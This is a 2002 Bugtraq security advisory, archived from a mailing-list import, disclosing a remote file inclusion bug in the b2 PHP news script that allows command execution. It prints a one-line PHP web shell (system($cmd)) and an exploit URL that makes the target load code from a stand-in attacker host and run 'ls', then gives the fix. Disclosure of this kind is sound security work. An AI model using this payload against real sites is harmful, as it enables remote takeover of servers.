8400032 2002-05-06 10:13 +0000  /56 rader/ Frank <thran60@hotmail.com>
Sänt av: joel@lysator.liu.se
Importerad: 2002-05-06  17:12  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <22179>
Ärende: b2 php remote command execution
------------------------------------------------------------
From: Frank <thran60@hotmail.com>
To: bugtraq@securityfocus.com
Message-ID: <20020506101337.9743.qmail@mail.securityfocus.com>



Site: www.cafelog.com
Vulnerable:

b2 0.6pre2 and earlier.

B2 is a php script which allows webmasters to quikly post 
news on the frontpage and let viewers interact with 
eachother. A bug exists in the scripts which allows an 
attacker to remotely execute commands.

Exploit:

Taken from /b2-include/b2edit.showposts.php
 
*snippet*
 
<?php
include_once ("b2config.php");
include_once ($b2inc."/b2functions.php");
 
*snippet*
 
But since b2config.php does not exist inside the directory, 
an attacker can define $b2inc himself.
So if the attacker creates a file on his server, for 
example www.attacker.com , called b2functions.php, and he 
writes the following in it :
 
<? 
system($cmd);
?>
 
(note : the attacker's server must not be able to run php, 
it has to open the file as text)
 
he can include the file like this :
 
http://www.vulnerablehost.com/b2/b2-
include/b2edit.showposts.php?b2inc=http://www.attacker.com&c
md=ls
 
This would execute the ls command on vulnerablehost.com.

Fix:
Copy b2config.php into the b2-include directory

The vendor has been warned, and already released the same 
fix a few days earlier.
(8400032) /Frank <thran60@hotmail.com>/-------------